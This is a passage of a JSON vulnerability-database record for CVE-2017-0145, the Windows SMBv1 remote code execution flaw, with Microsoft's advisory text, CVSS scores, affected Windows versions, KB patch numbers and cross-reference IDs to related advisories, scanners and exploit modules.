"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0145", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0145"], "immutableFields": [], "lastseen": "2021-10-06T10:49:13", "history": [{"bulletin": {"id": "MS:CVE-2017-0145", "hash": "610b06c00c6979a0489de84ab5d2f19794bd75b251d9ff2bd6dd034946cfaa80", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution 
vulnerability exists in the way that the Microsoft\nServer Message Block 1.0 (SMBv1) server handles certain requests. An attacker\nwho successfully exploited the vulnerability could gain the ability to execute\ncode on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker\ncould send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1\nhandles these specially crafted requests.\n\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {}, "cvss3": {}, "href": "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0145", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0145"], "immutableFields": [], "lastseen": "2019-08-12T00:31:47", "history": [], "viewCount": 37, "enchantments": {"dependencies": {"modified": "2019-08-12T00:31:47", "references": [{"idList": ["KLA10977", "KLA10979"], "type": "kaspersky"}, {"idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"], "type": "malwarebytes"}, {"idList": ["ICSMA-18-058-02"], "type": "ics"}, {"idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"], "type": "rapid7community"}, {"idList": ["1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-33313", "1337DAY-ID-33895", "1337DAY-ID-27613"], "type": "zdt"}, {"idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"], "type": "openvas"}, {"idList": ["KB4013389"], "type": "mskb"}, {"idList": ["THREATPOST:302BC8714784E3B4BB7EC5CD2F81C1BA", 
"THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61"], "type": "threatpost"}, {"idList": ["THN:2E043D9BAC04DEE81005124DD54A31E2"], "type": "thn"}, {"idList": ["PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:142548", "PACKETSTORM:156196"], "type": "packetstorm"}, {"idList": ["SMNTC-96705"], "type": "symantec"}, {"idList": ["MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:C211C70545FBDF88C2F99362DC4608A8"], "type": "mmpc"}, {"idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37"], "type": "trendmicroblog"}, {"idList": ["SSV:92952"], "type": "seebug"}, {"idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:41891"], "type": "exploitdb"}, {"idList": ["F5:K57181937"], "type": "f5"}, {"idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE"], "type": "metasploit"}, {"idList": ["MS17-010.NASL", "SMB_NT_MS17-010.NASL"], "type": "nessus"}, {"idList": ["HUAWEI-SA-20170513-01-WINDOWS"], "type": "huawei"}, {"idList": ["CVE-2017-0145"], "type": "cve"}], "rev": 2}, "score": {"modified": "2019-08-12T00:31:47", "rev": 2, "value": 7.5, "vector": "NONE"}}, "objectVersion": "1.4", "kbList": ["KB3213986", "KB4012217", "KB4012215", "KB3210721", "KB4012606", "KB4012216", "KB3205409", "KB3210720", "KB3205401", "KB4014077", "KB4012598", "KB4013198", "KB3177186", "KB3212646", "KB4013429"], "msrc": "", "mscve": "CVE-2017-0145", "msAffectedSoftware": [{"kb": "KB4012598", "kbSupersedence": "KB3177186", "msplatform": "", "name": "Windows Server 2008 for x64-based Systems Service Pack 2"}, {"kb": "KB4012216", "kbSupersedence": "KB3205401", 
"msplatform": "", "name": "Windows Server 2012 R2 (Server Core installation)"}, {"kb": "KB4012606", "kbSupersedence": "KB3210720", "msplatform": "", "name": "Windows 10 for x64-based Systems"}, {"kb": "KB4012216", "kbSupersedence": "KB3205401", "msplatform": "", "name": "Windows 8.1 for x64-based systems"}, {"kb": "KB4012215", "kbSupersedence": "KB3212646", "msplatform": "", "name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1"}, {"kb": "KB4013429", "kbSupersedence": "KB3213986", "msplatform": "", "name": "Windows Server 2016 (Server Core installation)"}, {"kb": "KB4012598", "kbSupersedence": "KB3177186", "msplatform": "", "name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2"}, {"kb": "KB4012215", "kbSupersedence": "KB3212646", "msplatform": "", "name": "Windows 7 for x64-based Systems Service Pack 1"}, {"kb": "KB4013429", "kbSupersedence": "KB3213986", "msplatform": "", "name": "Windows 10 Version 1607 for 32-bit Systems"}, {"kb": "KB4013429", "kbSupersedence": "KB3213986", "msplatform": "", "name": "Windows Server 2016"}, {"kb": "KB4012215", "kbSupersedence": "KB3212646", "msplatform": "", "name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1"}, {"kb": "KB4012598", "kbSupersedence": "KB3177186", "msplatform": "", "name": "Windows Vista x64 Edition Service Pack 2"}, {"kb": "KB4013198", "kbSupersedence": "KB3210721", "msplatform": "", "name": "Windows 10 Version 1511 for x64-based Systems"}, {"kb": "KB4012598", "kbSupersedence": "KB3177186", "msplatform": "", "name": "Windows Server 2008 for 32-bit Systems Service Pack 2"}, {"kb": "KB4012598", "kbSupersedence": "KB3177186", "msplatform": "", "name": "Windows Vista Service Pack 2"}, {"kb": "KB4012216", "kbSupersedence": "KB3205401", "msplatform": "", "name": "Windows 8.1 for 32-bit systems"}, {"kb": "KB4013198", "kbSupersedence": "KB3210721", "msplatform": "", "name": "Windows 10 Version 1511 for 32-bit Systems"}, {"kb": "KB4012215", "kbSupersedence": "KB3212646", 
"msplatform": "", "name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)"}, {"kb": "KB4012217", "kbSupersedence": "KB3205409", "msplatform": "", "name": "Windows Server 2012 (Server Core installation)"}, {"kb": "KB4012216", "kbSupersedence": "KB3205401", "msplatform": "", "name": "Windows Server 2012 R2"}, {"kb": "KB4012598", "kbSupersedence": "KB3177186", "msplatform": "", "name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)"}, {"kb": "KB4013429", "kbSupersedence": "KB3213986", "msplatform": "", "name": "Windows 10 Version 1607 for x64-based Systems"}, {"kb": "KB4012217", "kbSupersedence": "KB3205409", "msplatform": "", "name": "Windows Server 2012"}, {"kb": "KB4012216", "kbSupersedence": "KB4014077", "msplatform": "", "name": "Windows RT 8.1"}, {"kb": "KB4012598", "kbSupersedence": "KB3177186", "msplatform": "", "name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)"}, {"kb": "KB4012215", "kbSupersedence": "KB3212646", "msplatform": "", "name": "Windows 7 for 32-bit Systems Service Pack 1"}, {"kb": "KB4012606", "kbSupersedence": "KB3210720", "msplatform": "", "name": "Windows 10 for 32-bit Systems"}], "vendorCvss": {}}, "lastseen": "2019-08-12T00:31:47", "differentElements": ["description"], "edition": 1}, {"bulletin": {"id": "MS:CVE-2017-0145", "hash": "0dea3a83027b5e4e9ecf6f325a34f59a", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. 
An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {}, "cvss3": {}, "href": "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0145", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0145"], "immutableFields": [], "lastseen": "2020-08-07T11:45:28", "history": [], "viewCount": 46, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0145"]}, {"type": "symantec", "idList": ["SMNTC-96705"]}, {"type": "mmpc", "idList": ["MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:C211C70545FBDF88C2F99362DC4608A8"]}, {"type": "threatpost", "idList": ["THREATPOST:302BC8714784E3B4BB7EC5CD2F81C1BA", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}, {"type": "thn", "idList": ["THN:2E043D9BAC04DEE81005124DD54A31E2"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "zdt", "idList": ["1337DAY-ID-27613", "1337DAY-ID-33895", "1337DAY-ID-33313", "1337DAY-ID-27786", 
"1337DAY-ID-27752"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:47456", "EDB-ID:41987"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142548", "PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:156196"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010"]}, {"type": "kaspersky", "idList": ["KLA10977", "KLA11902", "KLA10979"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "nessus", "idList": ["MS17-010.NASL", "SMB_NT_MS17-010.NASL"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2020-08-07T11:45:28", "rev": 2}, "score": {"value": 7.5, "vector": "NONE", "modified": "2020-08-07T11:45:28", "rev": 2}}, "objectVersion": "1.4", "kbList": ["KB3213986", "KB4012217", "KB4012215", "KB3210721", "KB4012606", "KB4012216", "KB3205409", "KB3210720", "KB3205401", "KB4014077", "KB4012598", "KB4013198", "KB3177186", "KB3212646", "KB4013429"], "msrc": "", "mscve": "CVE-2017-0145", "msAffectedSoftware": [{"kb": "KB4012598", "kbSupersedence": "KB3177186", "msplatform": "", "name": "Windows Server 2008 for x64-based Systems Service Pack 2"}, {"kb": "KB4012216", "kbSupersedence": "KB3205401", 
"msplatform": "", "name": "Windows Server 2012 R2 (Server Core installation)"}, {"kb": "KB4012606", "kbSupersedence": "KB3210720", "msplatform": "", "name": "Windows 10 for x64-based Systems"}, {"kb": "KB4012216", "kbSupersedence": "KB3205401", "msplatform": "", "name": "Windows 8.1 for x64-based systems"}, {"kb": "KB4012215", "kbSupersedence": "KB3212646", "msplatform": "", "name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1"}, {"kb": "KB4013429", "kbSupersedence": "KB3213986", "msplatform": "", "name": "Windows Server 2016 (Server Core installation)"}, {"kb": "KB4012598", "kbSupersedence": "KB3177186", "msplatform": "", "name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2"}, {"kb": "KB4012215", "kbSupersedence": "KB3212646", "msplatform": "", "name": "Windows 7 for x64-based Systems Service Pack 1"}, {"kb": "KB4013429", "kbSupersedence": "KB3213986", "msplatform": "", "name": "Windows 10 Version 1607 for 32-bit Systems"}, {"kb": "KB4013429", "kbSupersedence": "KB3213986", "msplatform": "", "name": "Windows Server 2016"}, {"kb": "KB4012215", "kbSupersedence": "KB3212646", "msplatform": "", "name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1"}, {"kb": "KB4012598", "kbSupersedence": "KB3177186", "msplatform": "", "name": "Windows Vista x64 Edition Service Pack 2"}, {"kb": "KB4013198", "kbSupersedence": "KB3210721", "msplatform": "", "name": "Windows 10 Version 1511 for x64-based Systems"}, {"kb": "KB4012598", "kbSupersedence": "KB3177186", "msplatform": "", "name": "Windows Server 2008 for 32-bit Systems Service Pack 2"}, {"kb": "KB4012598", "kbSupersedence": "KB3177186", "msplatform": "", "name": "Windows Vista Service Pack 2"}, {"kb": "KB4012216", "kbSupersedence": "KB3205401", "msplatform": "", "name": "Windows 8.1 for 32-bit systems"}, {"kb": "KB4013198", "kbSupersedence": "KB3210721", "msplatform": "", "name": "Windows 10 Version 1511 for 32-bit Systems"}, {"kb": "KB4012215", "kbSupersedence": "KB3212646", 
"msplatform": "", "name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)"}, {"kb": "KB4012217", "kbSupersedence": "KB3205409", "msplatform": "", "name": "Windows Server 2012 (Server Core installation)"}, {"kb": "KB4012216", "kbSupersedence": "KB3205401", "msplatform": "", "name": "Windows Server 2012 R2"}, {"kb": "KB4012598", "kbSupersedence": "KB3177186", "msplatform": "", "name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)"}, {"kb": "KB4013429", "kbSupersedence": "KB3213986", "msplatform": "", "name": "Windows 10 Version 1607 for x64-based Systems"}, {"kb": "KB4012217", "kbSupersedence": "KB3205409", "msplatform": "", "name": "Windows Server 2012"}, {"kb": "KB4012216", "kbSupersedence": "KB4014077", "msplatform": "", "name": "Windows RT 8.1"}, {"kb": "KB4012598", "kbSupersedence": "KB3177186", "msplatform": "", "name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)"}, {"kb": "KB4012215", "kbSupersedence": "KB3212646", "msplatform": "", "name": "Windows 7 for 32-bit Systems Service Pack 1"}, {"kb": "KB4012606", "kbSupersedence": "KB3210720", "msplatform": "", "name": "Windows 10 for 32-bit Systems"}], "vendorCvss": {}}, "lastseen": "2020-08-07T11:45:28", "differentElements": ["href", "kbList", "msAffectedSoftware"], "edition": 2}, {"bulletin": {"id": "MS:CVE-2017-0145", "hash": "1b472ec5c59922cde812024562ec895a", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. 
An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {}, "cvss3": {}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0145", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0145"], "immutableFields": [], "lastseen": "2021-03-18T19:17:49", "history": [], "viewCount": 46, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0145"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE"]}, {"type": "symantec", "idList": ["SMNTC-96705"]}, {"type": "threatpost", "idList": ["THREATPOST:302BC8714784E3B4BB7EC5CD2F81C1BA", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D"]}, {"type": "mmpc", "idList": ["MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052"]}, {"type": "thn", "idList": ["THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:2E043D9BAC04DEE81005124DD54A31E2"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "malwarebytes", "idList": 
["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "zdt", "idList": ["1337DAY-ID-27613", "1337DAY-ID-33895", "1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-33313"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:156196", "PACKETSTORM:142181", "PACKETSTORM:154690", "PACKETSTORM:142548"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "kaspersky", "idList": ["KLA10979", "KLA10977", "KLA11902"]}, {"type": "exploitdb", "idList": ["EDB-ID:41987", "EDB-ID:41891", "EDB-ID:47456"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "nessus", "idList": ["SMB_NT_MS17-010.NASL", "MS17-010.NASL"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-03-18T19:17:49", "rev": 2}, "score": {"value": 7.5, "vector": "NONE", "modified": "2021-03-18T19:17:49", "rev": 2}}, "objectVersion": "1.5", "kbList": ["KB4013198", "KB3205401", "KB3177186", "KB3212646", "KB4012214", "KB4012598", "KB3205409", "KBMS16-110, 3187754", "KB4014077", "KB3210720", "KB3213986", "KB3210721", "KB4013429", "KB4012215", "KB4012216", "KB4012606", "KB4012217", "KB4012212", "KB4012213"], "msrc": "", "mscve": "CVE-2017-0145", "msAffectedSoftware": [{"name": "Windows Vista x64 Edition Service Pack 2", 
"kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems 
Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB4014077", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": 
"Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-03-18T19:17:49", "differentElements": ["cvss2", "cvss3"], "edition": 3}, {"bulletin": {"id": "MS:CVE-2017-0145", "hash": "5909803c234c7ba25bf5a9f51be4ff6f", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. 
An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0145", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0145"], "immutableFields": [], "lastseen": "2021-07-28T20:07:07", "history": [], "viewCount": 46, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0145"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", 
